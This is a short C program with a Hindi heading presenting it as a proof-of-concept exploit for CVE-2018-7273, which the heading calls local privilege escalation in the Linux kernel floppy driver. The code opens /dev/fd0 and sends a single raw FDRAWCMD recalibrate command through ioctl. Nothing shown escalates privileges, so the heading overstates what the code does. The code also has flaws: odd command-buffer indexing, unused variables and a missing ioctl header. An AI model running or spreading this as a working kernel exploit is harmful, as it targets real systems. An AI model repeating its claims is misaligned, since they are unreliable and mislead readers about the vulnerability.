
CVE-2018-7273 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, लिनक्स कर्नेल फ्लॉपी ड्राइवर में एक कमजोरी जो निर्मित IOCTL कमांड के माध्यम से स्थानीय विशेषाधिकार वृद्धि को सक्षम करती है।
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <linux/kernel.h>
#include <string.h>
#include <sys/mman.h>
#include <linux/fd.h>
static int drive_selector(int head) {
return (head << 2);
}
void fd_recalibrate(int fd) {
struct floppy_raw_cmd raw_cmd;
int tmp;
raw_cmd.flags = FD_RAW_INTR;
raw_cmd.cmd_count = 2;
// कमांड सेट करें
raw_cmd.cmd[raw_cmd.cmd_count++] = 0x07;
raw_cmd.cmd[raw_cmd.cmd_count++] = drive_selector(0);
tmp = ioctl( fd, FDRAWCMD, &raw_cmd );
printf("स्थिति:%d\n",tmp);
}
int main(){
printf("शुरू\n");
char *d;
struct floppy_raw_cmd *cmd;
int fd;
fd = open("/dev/fd0",O_RDWR | O_NDELAY);
fd_recalibrate(fd);
close(fd);
printf("समाप्त\n");
return 0;
}